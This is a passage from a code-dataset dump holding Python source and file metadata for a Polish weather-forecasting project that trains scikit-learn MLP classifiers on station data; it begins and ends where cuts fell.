{}\".format(\n json_data[activations_key], ALL_ACTIVATIONS))\n L.info(\"ACTIVATIONS = {} -> {}\".format(ACTIVATIONS, json_data[activations_key]))\n global ACTIVATIONS\n ACTIVATIONS = json_data[activations_key]\n\n # SOLVERS\n if solvers_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(solvers_key))\n if isinstance(json_data[solvers_key], list):\n if not all(a in ALL_SOLVERS for a in json_data[solvers_key]):\n raise ValueError(\"wartości {} powinny być ze zbioru {}\".format(\n json_data[solvers_key], ALL_SOLVERS))\n L.info(\"SOLVERS = {} -> {}\".format(SOLVERS, json_data[solvers_key]))\n global SOLVERS\n SOLVERS = json_data[solvers_key]\n\n\ndef process(\n data_type: str,\n data_dir: str,\n cfg_json: str,\n output_dir: str = dfs.OUTPUT_DIR,\n logs_dir: str = dfs.LOGS_DIR,\n range_days: int = dfs.RANGE_DAYS,\n interval: int = dfs.INTERVAL,\n train_sets: int = dfs.TRAIN_SETS,\n train_days: int = dfs.TRAIN_DAYS,\n test_sets: int = dfs.TEST_SETS,\n horizons: typing.Iterable[int] = dfs.HORIZONS,\n):\n \"\"\"Funkcja wykonująca kolejne etapy uczenia, testowania i prognozowania.\n\n Args:\n data_type: rodzaj danych (LOOP2 lub IMGW)\n data_dir: ścieżka do katalogu z danymi (odpowiednio loop2 lub imgw)\n cfg_json: json zawierający nadpisane domyślne wartości takie jak TEMPERATURE_TOLERANCE, czy N_REPS\n output_dir: katalog na rezultaty uczenia w formacie CSV\n logs_dir: katalog na logi\n range_days: liczba dni, z których będą robione dane do uczenia i testowania\n interval: interwał, do którego agregowane są dane\n train_sets: liczba zbiorów uczących\n train_days: liczba dni wejściowych\n test_sets: liczba zbiorów testowych\n horizons: lista horyzontów prognozy (w godzinach)\n \"\"\"\n\n if cfg_json is not None:\n _overwrite_defaults(cfg_json)\n\n _add_file_handler(logs_dir)\n\n _check_data_type(data_type)\n\n L.info(\"uruchomienie dvik-forecast dla daty {}\".format(dfs.UTC_NOW))\n\n start_dt, end_dt = dapi.get_range_dts(data_dir, range_days, interval)\n dts = dapi.get_dts(start_dt, end_dt, interval)\n _validate(data_dir, output_dir, dts, interval, train_sets, train_days, test_sets, horizons)\n\n proc_params = [\n \"data_type={}\".format(data_type),\n \"data_dir={}\".format(data_dir),\n \"output_dir={}\".format(output_dir),\n \"logs_dir={}\".format(logs_dir),\n \"range_days={}\".format(range_days),\n \"interval={}\".format(interval),\n \"train_sets={}\".format(train_sets),\n \"train_days={}\".format(train_days),\n \"test_sets={}\".format(test_sets),\n \"horizons={}\".format(horizons),\n \"start_dt={}\".format(start_dt),\n \"end_dt={}\".format(end_dt),\n ]\n L.info(\"parametry przetwarzania: {}\".format(', '.join(proc_params)))\n\n dt_sets = dapi.get_dt_sets(\n dts=dts,\n n_sets=train_sets + test_sets,\n set_intervals=train_days * (24 // interval),\n horizon_intervals=list(map(lambda f: f // interval, horizons))\n )\n\n l2_data = dapi.get_loop2_data(data_dir, start_dt, end_dt, interval)\n curr_full_utc_dt = max(l2_data)\n\n L.info('przygotowano zbiory dat do treningu')\n\n params = [\n ('avg_temp', 'temperatura', TEMPERATURE_TOLERANCE, TEMPERATURE_CODE),\n ('avg_press', 'ciśnienie', PRESSURE_TOLERANCE, PRESSURE_CODE),\n ('max_wind', 'wiatr', WIND_TOLERANCE, WIND_CODE),\n ('max_prec', 'opad atmosferyczny', PRECIPITATION_TOLERANCE, PRECIPITATION_CODE),\n ]\n\n forecasts = {} # param -> horizon_utc_dt -> (value, +-, param_name)\n\n for out_param, param_name, param_tol, param_code in params:\n forecasts[param_code] = {}\n\n param_learn_sets = lng.prepare_learning_sets(l2_data, dt_sets, out_param, RES_SCALE)\n L.info(\"przygotowano zbiory uczące dla parametru '{}'\".format(param_name))\n\n csv_file_path = os.path.join(\n output_dir,\n dfs.UTC_NOW.strftime('{}_learn_res_%y%m%d_%H%M.csv'.format(param_code))\n )\n\n ch_params = ', '.join([\n \"hidden_layer_factors = {}\".format(HIDDEN_LAYER_FACTORS),\n \"activations = {}\".format(ACTIVATIONS),\n \"solvers = {}\".format(SOLVERS),\n \"tolerance = {}\".format(TEMPERATURE_TOLERANCE),\n \"good_result = {}\".format(GOOD_RESULT),\n \"n_reps = {}\".format(N_REPS),\n \"res_scale = {}\".format(RES_SCALE),\n \"max_iter = {}\".format(MAX_ITER),\n \"early_stopping = {}\".format(EARLY_STOPPING),\n ])\n L.info(\"wybieranie klasyfikatora dla parametru '{}' dla konfiguracji: {}\".format(\n param_name, ch_params))\n clfs = lng.choose_classifiers(train_sets, test_sets, param_learn_sets,\n hidden_layer_factors=HIDDEN_LAYER_FACTORS,\n activations=ACTIVATIONS,\n solvers=SOLVERS,\n tolerance=param_tol,\n good_result=GOOD_RESULT,\n n_reps=N_REPS,\n res_scale=RES_SCALE,\n max_iter=MAX_ITER,\n early_stopping=EARLY_STOPPING,\n csv_file_path=csv_file_path)\n\n L.debug(\"najlepsze klasyfikatory dla parametru '{}':\".format(param_name))\n for i, h in enumerate(horizons):\n stats_txt = ', '.join([\n \"wynik = {}\".format(clfs[i][1]['result_score']),\n \"średnie odchylenie = {}\".format(clfs[i][1]['mean_diff']),\n \"mediana odchylenia = {}\".format(clfs[i][1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(clfs[i][1]['max_diff']),\n \"niepewność standardowa = {}\".format(clfs[i][1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(clfs[i][1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(clfs[i][1]['result_sd']),\n \"porównanie = {}\".format(clfs[i][2]),\n ])\n L.info(\"najlepszy klasyfikator dla parametru '{}' dla horyzontu {}: {}\".format(\n param_name, h, stats_txt))\n L.debug(\"klasyfikator = {}\".format(clfs[i][0]))\n\n pr_res = lng.predict(l2_data, clfs[i][0], train_days * (24 // interval)) / RES_SCALE\n\n horizon_utc_dt = curr_full_utc_dt + datetime.timedelta(hours=h)\n # L.debug(\"---------------------------------------------\")\n # L.info(\"wyznaczono parametr '{}' dla horyzontu {} ({}) = {}\".format(\n # param_name, h, horizon_utc_dt.strftime(\"%Y-%m-%d %H:%M UTC\"), pr_res))\n # L.debug(\"---------------------------------------------\")\n\n forecasts[param_code][horizon_utc_dt] = (pr_res, clfs[i][1]['sd_diff'], param_name)\n\n L.info(curr_full_utc_dt.strftime(\"prognoza z %Y-%m-%d %H:%M UTC\"))\n for param_code in forecasts:\n for utc_dt in sorted(forecasts[param_code]):\n val, sd, param_name = forecasts[param_code][utc_dt]\n min_val = round(val - sd, 1)\n max_val = round(val + sd, 1)\n if param_code in (WIND_CODE, PRECIPITATION_CODE):\n min_val = max(0, min_val)\n L.info(\"{} na {} UTC = {} <{}; {}>\".format(\n param_name, utc_dt.strftime(\"%Y-%m-%d %H:%M UTC\"), val, min_val, max_val))\n\n\ndef _check_data_type(data_type: str):\n \"\"\"Sprawdza, czy zadany typ danych jest wspierany.\n\n Args:\n data_type: typ danych\n\n Raises:\n NotImplementedError: jeśli zadany typ danych nie jest wspierany\n \"\"\"\n\n if data_type != dfs.LOOP2_DATA_TYPE:\n L.error('typ danych \"{}\" nie jest jeszcze wspierany'.format(data_type))\n raise NotImplementedError('typ danych {} nie jest jeszcze wspierany'.format(data_type))\n\n\ndef _add_file_handler(logs_dir: str):\n \"\"\"Dodaje uchwyt do pliku do loggera. Jeśli katalog na logi nie istnieje, to tworzy go.\n\n Args:\n logs_dir: katalog na logi\n \"\"\"\n\n logs_dir_created = False\n if not os.path.exists(logs_dir):\n os.makedirs(logs_dir)\n logs_dir_created = True\n\n log_file_path = os.path.join(logs_dir, dfs.LOG_FILE_NAME)\n dvl.add_file_handler(dfs.LOGGER_NAME, file_path=log_file_path)\n L.debug('logger={}: dodano uchwyt do pliku {}'.format(dfs.LOGGER_NAME, log_file_path))\n\n if logs_dir_created:\n L.info('utworzono katalog {}'.format(logs_dir))\n\n\ndef _validate(data_dir: str, output_dir: str, dts: typing.List[datetime.datetime], interval: int,\n train_sets: int, train_days: int, test_sets: int, horizons: typing.Iterable[int]):\n \"\"\"Waliduje dane.\n\n * data_dir musi istnieć.\n * Jeśli output_dir nie istnieje, to go tworzy.\n\n Args:\n data_dir:\n output_dir:\n dts:\n interval:\n train_sets:\n train_days:\n test_sets:\n horizons:\n\n Raises:\n IOError: jeśli data_dir nie istnieje\n ValueError: jeśli jest za mało dostępnych dat\n ArithmeticError: jeśli któryś z horyzontów prognozy nie jest podzielny przez interwał\n \"\"\"\n\n if not os.path.exists(data_dir):\n L.error('katalog {} nie istnieje'.format(data_dir))\n raise IOError('katalog {} nie istnieje'.format(data_dir))\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n L.info('utworzono katalog {}'.format(output_dir))\n\n # sprawdzam, czy liczba dostępnych dat jest wystarczająca\n set_size = train_days * 24 // interval + max(horizons) // interval\n required_n_dts = 2 * (train_sets + test_sets) + set_size\n required_n_days = required_n_dts // (24 // interval) + 1\n if len(dts) < required_n_dts:\n L.error('za mało dat: jest {}, potrzeba przynajmniej {} ({} dni)'.format(\n len(dts), required_n_dts, required_n_days))\n raise ValueError('za mało dat: jest {}, potrzeba przynajmniej {} ({} dni)'.format(\n len(dts), required_n_dts, required_n_days))\n\n if any(map(lambda f: f % interval > 0, horizons)):\n L.error('wszystkie horyzonty prognozy={} muszą być podzielne przez interwał={}'.format(\n horizons, interval))\n raise ArithmeticError('wszystkie horyzonty prognozy={} muszą być podzielne przez'\n ' interwał={}'.format(horizons, interval))\n"
},
{
"alpha_fraction": 0.568509578704834,
"alphanum_fraction": 0.5771284699440002,
"avg_line_length": 34.659671783447266,
"blob_id": "5ec2438c6c77909da1e67b863a1e637fd590ebde",
"content_id": "1f6515c677178a4c6f0a275ff9d8452e7ae2d5e2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23977,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 667,
"path": "/dvik_forecast/learning.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import warnings\n\nwarnings.filterwarnings('ignore')\n\nimport datetime\nimport typing\nimport random\nfrom sklearn import neural_network as snn\nimport csv\n\nfrom . import defaults as dfs\n\nimport dvik_logging as dvl\nimport dvik_print as dvp\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\nPP = dvp.PrettyPrint(filename=__file__, show_line=True)\n\n# ([[v11, v12, ...], [v21, ...], ...], [c1, c2, ...])\nLEARNING_SET_TYPE = typing.Tuple[typing.List[typing.List[float]], typing.List[int]]\n\nACTIVATION_IDENTITY = 'identity'\nACTIVATION_LOGISTIC = 'logistic'\nACTIVATION_TANH = 'tanh'\nACTIVATION_RELU = 'relu'\n\nACTIVATIONS = (ACTIVATION_IDENTITY, ACTIVATION_LOGISTIC, ACTIVATION_TANH, ACTIVATION_RELU)\n\nSOLVER_LBFGS = 'lbfgs'\nSOLVER_SGD = 'sgd'\nSOLVER_ADAM = 'adam'\n\nSOLVERS = (SOLVER_LBFGS, SOLVER_SGD, SOLVER_ADAM)\n\nDEFAULT_RES_SCALE = 2\nDEFAULT_N_REPS = 5\nDEFAULT_MAX_ITER = 100000\nDEFAULT_EARLY_STOPPING = True\n\n\ndef prepare_learning_sets(data: typing.Dict[datetime.datetime, dict],\n dt_sets: typing.List[typing.Dict[str, typing.List[datetime.datetime]]],\n out_param: str, res_scale: float = DEFAULT_RES_SCALE\n ) -> typing.List[LEARNING_SET_TYPE]:\n \"\"\"Przygotowuje zbiory danych do uczenia. Będzie to N par (A, B), gdzie\n N - całkowita liczba zbiorów uczących i testowych,\n A - macierz, gdzie wiersz to interwał, a kolumna to parametr,\n B - lista wynikowych klas.\n\n Args:\n data: dane dla poszczególnych dat\n dt_sets: zbiory dat dla każdego zbioru uczącego i testowego\n out_param: nazwa parametru, który będzie klasą wyniku\n res_scale: skala klasy wynikowych, domyślnie DEFAULT_RES_SCALE\n\n Returns:\n lista par (A, B)\n \"\"\"\n\n L.info(\"przygotowywanie zbiorów do uczenia: res_scale = {}\".format(res_scale))\n\n learn_sets = []\n\n for dts in dt_sets:\n in_vals = _get_input_params(dts['in_dts'], data)\n out_vals = _get_output_params(dts['out_dts'], data, out_param, res_scale)\n learn_sets.append((in_vals, out_vals))\n\n return learn_sets\n\n\ndef _get_input_params(in_dts: typing.List[datetime.datetime], data: typing.Dict[datetime.datetime, dict]\n ) -> typing.List[typing.List[float]]:\n \"\"\"Zwraca macierz parametrów wejściowych.\n\n Args:\n in_dts: daty wejściowe danego zestawu\n data: dane dla poszczególnych interwałów\n\n Returns:\n macierz parametrów\n \"\"\"\n\n res = []\n for idt in in_dts:\n res.append(_get_data_row(idt, data[idt]))\n\n return res\n\n\ndef _normalize(val: float, min_val: float, max_val: float) -> int:\n \"\"\"Normalizuje wartość val względem min_val i max_val tak, żeby przyjęła ona wartość 0-100.\n\n Args:\n val: normalizowana wartość\n min_val: dolna granica\n max_val: górna granica\n\n Returns:\n znormalizowana wartość\n \"\"\"\n\n val = max(min_val, val)\n val = min(max_val, val)\n\n nv = (val - min_val) / (max_val - min_val)\n return int(round(100.0 * nv))\n\n\ndef _get_data_row(dt: datetime.datetime, dt_data: typing.Dict[str, float]) -> typing.List[float]:\n \"\"\"Zwraca wiersz macierzy parametrów wejściowych.\n\n Args:\n dt: data\n dt_data: dane dla daty\n\n Returns:\n wiersz z danymi\n \"\"\"\n\n hour = dt.hour\n days = (dt - datetime.datetime(year=dt.year, month=1, day=1)).days\n\n return [\n _normalize(dt_data['avg_temp'], -15, 35),\n _normalize(dt_data['max_wind'], 0, 10),\n _normalize(dt_data['avg_wind_dir'], 0, 360),\n _normalize(dt_data['avg_hum'], 0, 100),\n _normalize(dt_data['max_prec'], 0, 5),\n _normalize(dt_data['avg_press'], 990, 1010),\n _normalize(hour, 0, 23),\n _normalize(days, 1, 366),\n ]\n\n\ndef _get_output_params(out_dts: typing.List[datetime.datetime], data: typing.Dict[datetime.datetime, dict],\n out_param: str, res_scale: float) -> typing.List[int]:\n \"\"\"Zwraca listę klas wyjściowych.\n\n Args:\n out_dts: daty, dla których będą wyznaczone klasy wyjściowe\n data: dane dla poszczególnych dat\n out_param: klucz parametru, dla którego będą wyznaczane klasy\n res_scale: skala klas wynikowych\n\n Returns:\n lista klas\n \"\"\"\n\n return [int(round(res_scale * data[odt][out_param], 0)) for odt in out_dts]\n\n\ndef _flatten(matrix: typing.List[typing.List[float]]) -> typing.List[float]:\n \"\"\"Wypłaszcza macierz. Przyjmijmy, że\n A = [v1\n v2\n ...\n vn]\n W wyniku działania tej funkcji otrzymamy A' = [v1 v2 ... vn]\n\n Args:\n matrix: macierz do wypłaszczenia\n\n Returns:\n wektor\n \"\"\"\n\n fv = []\n for r in matrix:\n fv += r\n return fv\n\n\ndef _compare_vectors(v1: typing.List[float], v2: typing.List[float], left: int = 3, right: int = 3,\n conn: str = \" -> \") -> str:\n \"\"\"Zwraca porównanie dwóch wektorów w formie tekstowej.\n Wektory są sortowane według różnic pomiędzy poszczególnymi elementami.\n Następnie wybierane jest left elementów z lewej, right z prawej i formatowane są do\n postaci tekstowej, np.\n v1 = [1, 2, 3, 4, 5, 6, 7, 8, 9] -> \"[1, 2, 3, ..., 7, 8, 9]\"\n Jeśli wektor ma poniżej 8 elementów, to wypisywane są wszystkie (po 3 z każdej i 1 zamiast \"...\").\n\n Args:\n v1: pierwszy wektor\n v2: drugi wektor\n left: ilośc elementów z lewej (domyślnie 3)\n right: ilość elementów z prawej (domyślnie 3)\n conn: string łączący oba wektory (domyślnie \" -> \")\n\n Returns:\n sformatowane, połączone, posortowane wektory\n \"\"\"\n\n if len(v1) != len(v2):\n raise IndexError(\"v1 ma {} elementów niż v2\".format(\"więcej\" if len(v1) > len(v2) else \"mniej\"))\n\n v = zip(v1, v2)\n v = sorted(v, key=lambda vi: abs(vi[0] - vi[1]))\n\n if len(v) > left + right:\n v1_left = [vi[0] for vi in v[:left]]\n v1_right = [vi[0] for vi in v[-right:]]\n v2_left = [vi[1] for vi in v[:left]]\n v2_right = [vi[1] for vi in v[-right:]]\n v1_full = v1_left + ['...'] + v1_right\n v2_full = v2_left + ['...'] + v2_right\n else:\n v1_full = [vi[0] for vi in v]\n v2_full = [vi[1] for vi in v]\n\n return \"[{}]{}[{}]\".format(\n ', '.join(map(str, v1_full)),\n conn,\n ', '.join(map(str, v2_full)),\n )\n\n\ndef choose_classifiers(n_train_sets: int, n_test_sets: int, learn_sets: typing.List[LEARNING_SET_TYPE],\n hidden_layer_factors: typing.List[typing.List[float]], activations: typing.List[str],\n solvers: typing.List[str], tolerance: float, good_result: typing.Dict[str, float],\n n_reps: int = DEFAULT_N_REPS, res_scale: float = DEFAULT_RES_SCALE,\n max_iter: int = DEFAULT_MAX_ITER, early_stopping: bool = DEFAULT_EARLY_STOPPING,\n csv_file_path: str = None) -> typing.List[typing.Tuple[snn.MLPClassifier, dict, str]]:\n \"\"\"Funkcja wybierająca najlepsze klasyfikatory\n\n Args:\n n_train_sets: liczba zbiorów uczących\n n_test_sets: liczba zbiorów testujących\n learn_sets: zbiory uczące i testujące wyznaczone w ramach zakresu\n hidden_layer_factors: lista list z współczynnikami do obliczenia wymiarów warstw ukrytych\n activations: lista funkcji aktywacji\n solvers: lista funkcji do optymalizacji wag\n\n tolerance: tolerancja wyniku\n good_result: słownik z wartościami determinującymi dobry rezultat\n\n n_reps: liczba powtórzeń dla każdej kombinacji parametrów, domyślnie DEFAULT_N_REPS\n res_scale: skala klas wynikowych, domyślnie DEFAULT_RES_SCALE\n max_iter: maksymalna liczba iteracji uczenia\n early_stopping: czy zatrzymać uczenie, jeśli nie przynosi rezultatu (dla \"sgd\" i \"adam\")\n csv_file_path: ścieżka do pliku csv, jeśli None, to pomijane\n\n Returns:\n\n \"\"\"\n\n res = []\n\n csv_fields = ['hidden_layers', 'activation', 'solver',\n 'wynik', 'średnie odchylenie', 'mediana odchylenia', 'maksymalne odchylenie',\n 'niepewność standardowa', 'oczekiwane odchylenie standardowe',\n 'otrzymane odchylenie standardowe', 'porównanie']\n csv_rows = []\n\n random.shuffle(learn_sets)\n train_sets = learn_sets[:n_train_sets]\n test_sets = learn_sets[-n_test_sets:]\n\n train_in_matrix = []\n train_out_vectors = []\n input_size = None\n for in_ts, out_ts in train_sets:\n train_in_matrix.append(_flatten(in_ts))\n if input_size is None:\n input_size = len(train_in_matrix[0])\n\n if len(train_out_vectors) == 0:\n for i in range(len(out_ts)):\n train_out_vectors.append([])\n\n for i, ot in enumerate(out_ts):\n train_out_vectors[i].append(ot)\n\n test_in_matrix = []\n test_out_vectors = []\n for in_ts, out_ts in test_sets:\n fl_in_ts = []\n for it in in_ts:\n fl_in_ts += it\n test_in_matrix.append(fl_in_ts)\n\n if len(test_out_vectors) == 0:\n for i in range(len(out_ts)):\n test_out_vectors.append([])\n\n for i, ot in enumerate(out_ts):\n test_out_vectors[i].append(ot)\n\n hl_sizes = []\n for hlf in hidden_layer_factors:\n hl_sizes.append(tuple([int(f * input_size) for f in hlf]))\n params = [(hls, a, s)\n for hls in hl_sizes\n for a in activations\n for s in solvers]\n\n n_it, total_its = 0, len(train_out_vectors) * len(params)\n for i, tov in enumerate(train_out_vectors):\n L.info(\"szukam najlepszego klasyfikatora dla {}. prognozy\".format(i + 1))\n forecast_best = None\n for hls, a, s in params:\n L.info(\"postęp: {}%\".format(round(100 * n_it / total_its, 1)))\n n_it += 1\n best_result = None\n for _ in range(n_reps):\n clf = _get_classifier(hls, a, s, max_iter, early_stopping)\n L.debug(\"utworzona klasyfikator MLP: hidden_layers='{}', activation='{}', solver='{}'\".format(\n hls, a, s))\n real_exp, real_res, stats = _train_classifier(\n clf, train_in_matrix, tov, test_in_matrix, test_out_vectors[i], tolerance, res_scale)\n\n if best_result is None or _compare_stats(stats, best_result[1], tolerance):\n best_result = (clf, stats, _compare_vectors(real_exp, real_res))\n L.debug(\"best_result -> {}\".format([\n best_result[1]['result_score'],\n best_result[1]['mean_diff'],\n best_result[1]['med_diff'],\n best_result[1]['max_diff'],\n best_result[1]['sd_diff'],\n best_result[1]['expected_sd'],\n best_result[1]['result_sd'],\n _compare_vectors(real_exp, real_res),\n ]))\n\n if not _good_result_conditions(stats, good_result):\n continue\n L.debug(\"oczekiwano: {}\".format(real_exp))\n L.debug(\"otrzymano: {}\".format(real_res))\n L.debug(', '.join([\n \"wynik = {}\".format(stats['result_score']),\n \"średnie odchylenie = {}\".format(stats['mean_diff']),\n \"mediana odchylenia = {}\".format(stats['med_diff']),\n \"maksymalne odchylenie = {}\".format(stats['max_diff']),\n \"niepewność standardowa = {}\".format(stats['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(stats['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(stats['result_sd']),\n \"porównanie = {}\".format(_compare_vectors(real_exp, real_res)),\n ]))\n\n params_txt = \"hidden_layers='{}', activation='{}', solver='{}'\".format(hls, a, s)\n stats_txt = ', '.join([\n \"wynik = {}\".format(best_result[1]['result_score']),\n \"średnie odchylenie = {}\".format(best_result[1]['mean_diff']),\n \"mediana odchylenia = {}\".format(best_result[1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(best_result[1]['max_diff']),\n \"niepewność standardowa = {}\".format(best_result[1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(best_result[1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(best_result[1]['result_sd']),\n \"porównanie = {}\".format(best_result[2]),\n ])\n L.info(\"najlepszy rezultat dla {}: {}\".format(params_txt, stats_txt))\n\n if forecast_best is None or _compare_stats(best_result[1], forecast_best[1], tolerance):\n L.info('uaktualniam forecast_best')\n if forecast_best is not None:\n L.info(\"było: {}\".format([\n forecast_best[1]['result_score'],\n forecast_best[1]['mean_diff'],\n forecast_best[1]['med_diff'],\n forecast_best[1]['max_diff'],\n forecast_best[1]['sd_diff'],\n forecast_best[1]['expected_sd'],\n forecast_best[1]['result_sd'],\n ]))\n forecast_best = best_result\n L.info(\"jest: {}\".format([\n forecast_best[1]['result_score'],\n forecast_best[1]['mean_diff'],\n forecast_best[1]['med_diff'],\n forecast_best[1]['max_diff'],\n forecast_best[1]['sd_diff'],\n forecast_best[1]['expected_sd'],\n forecast_best[1]['result_sd'],\n ]))\n\n # dodanie do csv\n if csv_file_path is not None:\n csv_rows.append({\n 'hidden_layers': hls,\n 'activation': a,\n 'solver': s,\n 'wynik': best_result[1]['result_score'],\n 'średnie odchylenie': best_result[1]['mean_diff'],\n 'mediana odchylenia': best_result[1]['med_diff'],\n 'maksymalne odchylenie': best_result[1]['max_diff'],\n 'niepewność standardowa': best_result[1]['sd_diff'],\n 'oczekiwane odchylenie standardowe': best_result[1]['expected_sd'],\n 'otrzymane odchylenie standardowe': best_result[1]['result_sd'],\n \"porównanie\": best_result[2],\n })\n\n stats_txt = ', '.join([\n \"wynik = {}\".format(forecast_best[1]['result_score']),\n \"średnie odchylenie = {}\".format(forecast_best[1]['mean_diff']),\n \"mediana odchylenia = {}\".format(forecast_best[1]['med_diff']),\n \"maksymalne odchylenie = {}\".format(forecast_best[1]['max_diff']),\n \"niepewność standardowa = {}\".format(forecast_best[1]['sd_diff']),\n \"oczekiwane odchylenie standardowe = {}\".format(forecast_best[1]['expected_sd']),\n \"otrzymane odchylenie standardowe = {}\".format(forecast_best[1]['result_sd']),\n \"porównanie = {}\".format(forecast_best[2]),\n ])\n L.info(\"najlepszy rezultat dla {}. prognozy: {}\".format(i + 1, stats_txt))\n\n res.append(forecast_best)\n\n if csv_file_path is not None:\n with open(csv_file_path, 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=csv_fields)\n writer.writeheader()\n for row in csv_rows:\n writer.writerow(row)\n L.info(\"wyniki uczenia zapisano do pliku {}\".format(csv_file_path))\n\n return res\n\n\ndef _compare_stats(a: typing.Dict[str, float], b: typing.Dict[str, float],\n tolerance: float) -> bool:\n \"\"\"Porównuje dwie statystyki. Zwraca prawdę, jeśli a jest lepsze od b.\n\n Args:\n a: statystyka a\n b: statystyka b\n tolerance: tolerancja wyniku\n\n Returns:\n prawda, jeśli a jest lepsze od b\n \"\"\"\n\n a_sd_diff = abs(a['expected_sd'] - a['result_sd'])\n\n return all([\n a_sd_diff < tolerance,\n a['max_diff'] < b['max_diff'],\n a['mean_diff'] < b['mean_diff'] or a['med_diff'] < b['med_diff'],\n ])\n\n\ndef _good_result_conditions(stats: typing.Dict[str, float], good_result: typing.Dict[str, float]\n ) -> bool:\n \"\"\"Sprawdza, czy są spełnione warunki \"dobrego rozwiązania\".\n\n Args:\n stats: słownik z miarami statystycznymi rozwiązania\n good_result: słownik z wartościami określającymi dobry rezultat\n\n Returns:\n prawda, jeśli są, fałsz, jeśli nie\n \"\"\"\n\n return all([\n stats['result_score'] >= good_result['min_result_score'],\n stats['max_diff'] <= good_result['max_max_diff'],\n stats['mean_diff'] <= good_result['max_mean_diff'],\n stats['med_diff'] <= good_result['max_med_diff'],\n abs(stats['expected_sd'] - stats['result_sd']) <= good_result['max_sd_diff'],\n ])\n\n\ndef _get_classifier(hidden_layers: typing.Tuple[int], activation: str, solver: str,\n max_iter: int, early_stopping: bool) -> snn.MLPClassifier:\n \"\"\"Zwraca klasyfikator MLP o podanych warstwach ukrytych, funkcji aktywacji i\n\n Args:\n hidden_layers: wymiary warst ukrytych\n activation: funkcja aktywacji warstw ukrytych\n solver: metoda optymalizacji wag\n max_iter: maksymalna liczba iteracji uczenia\n early_stopping: czy zatrzymać uczenie, jeśli nie przynosi rezultatu (dla \"sgd\" i \"adam\")\n\n Returns:\n obiekt klasyfikatora\n \"\"\"\n\n if activation not in ACTIVATIONS:\n msg = \"activation='{}', powinno być ze zbioru {}\".format(activation, ACTIVATIONS)\n L.error(msg)\n raise ValueError(msg)\n\n if solver not in SOLVERS:\n msg = \"solver='{}', powinno być ze zbioru {}\".format(solver, SOLVERS)\n L.error(msg)\n raise ValueError(msg)\n\n return snn.MLPClassifier(hidden_layer_sizes=hidden_layers, activation=activation, solver=solver,\n max_iter=max_iter, early_stopping=early_stopping)\n\n\ndef _train_classifier(clf: snn.MLPClassifier,\n train_in: typing.List[typing.List[float]], train_out: typing.List[int],\n test_in: typing.List[typing.List[float]], test_out: typing.List[int],\n tolerance: float, res_scale: float\n ) -> typing.Tuple[list, list, typing.Dict[str, float]]:\n \"\"\"Trenuje i testuje klasyfikator. Wynikiem jest słownik z miarami statystycznymi wyników testowych.\n\n Args:\n clf: klasyfikator MLP\n train_in: macierz Mu x N ucząca\n train_out: wektor 1 x Mu uczący\n test_in: macierz Mt x N testowa\n test_out: wektor 1 x Mt\n tolerance: maksymalne odchylenie wyniku\n res_scale: skala klas wynikowych\n\n Raises:\n ValueError: jeśli nie zgadzają się wymiary macierzy i wektorów\n\n Returns:\n słownik z miarami statycznymi testowania klasyfikatora\n \"\"\"\n\n # sprawdzenie macierzy i wektora uczącego\n m = len(train_in)\n n = len(train_in[0])\n if not all(len(r) == n for r in train_in):\n msg = \"wszystkie wiersze w macierzy test_in powinny mieć długość {}\".format(n)\n L.error(msg)\n raise ValueError(msg)\n if not len(train_out) == m:\n msg = \"wektor train_out powinien mieć wymiary 1 x {}, a nie 1 x {}\".format(m, len(train_out))\n L.error(msg)\n raise ValueError(msg)\n # sprawdzenie macierzy i wektora testowego\n m = len(test_out)\n if not all(len(r) == n for r in test_in):\n msg = \"wszystkie wiersze w macierzy test_in powinny mieć długość {}\".format(n)\n L.error(msg)\n raise ValueError(msg)\n if not len(test_out) == m:\n msg = \"wektor test_out powinien mieć wymiary 1 x {}, a nie 1 x {}\".format(m, len(test_out))\n L.error(msg)\n raise ValueError(msg)\n\n unscaled_test_out = [to / res_scale for to in test_out]\n\n clf.fit(train_in, train_out)\n\n result = clf.predict(test_in)\n unscaled_result = [r / res_scale for r in result]\n\n # print(test_out)\n # print(result)\n # print(unscaled_test_out)\n # print(unscaled_result)\n\n stats = _get_test_stats(unscaled_test_out, unscaled_result, tolerance)\n\n return unscaled_test_out, unscaled_result, stats\n\n\ndef _variance(v: typing.List[float]) -> float:\n \"\"\"Zwraca wariancję zbioru.\n\n Args:\n v: wektor z liczbami\n\n Returns:\n wariancja\n \"\"\"\n\n e = sum(v) / len(v)\n vnc = sum((x - e) ** 2 for x in v) / len(v)\n return vnc\n\n\ndef _standard_deviation(v: typing.List[float]) -> float:\n \"\"\"Zwraca odchylenie standardowe zbioru.\n\n Args:\n v: wektor z liczbami\n\n Returns:\n odchylenie standardowe\n \"\"\"\n\n return _variance(v) ** 0.5\n\n\ndef _median(values: typing.List[float]) -> float:\n \"\"\"Zwraca medianę wektora.\n\n Args:\n values: wektor z liczbami\n\n Returns:\n mediana\n \"\"\"\n\n s_vals = list(sorted(values))\n if len(s_vals) % 2 == 1:\n return s_vals[len(s_vals) // 2 - 1]\n return (s_vals[len(s_vals) // 2 - 1] + s_vals[len(s_vals) // 2]) / 2\n\n\ndef _get_test_stats(expected: typing.List[float], result: typing.List[float], tol: float, dec_places: int = 3,\n ) -> typing.Dict[str, float]:\n \"\"\"Zwraca słownik z miarami statystycznymi dla wyniku testowania klasyfikatora MLP.\n Zmienna tol mówi jakie odchylenie wyniku jest dopuszczalne. Powyżej tego wynik jest nieprawidłowy.\n\n Args:\n expected: lista z oczekiwanymi wartościami po przeskalowaniu\n result: lista z wynikami po przeskalowaniu\n tol: maksymalne dopuszczalne odchylenie wyniku\n dec_places: liczba miejsc po przecinku, domyślnie 3\n\n Returns:\n słownik z miarami statystycznymi\n\n Raises:\n ValueError: jeśli wektory wejściowe mają różne wymiary\n \"\"\"\n\n if 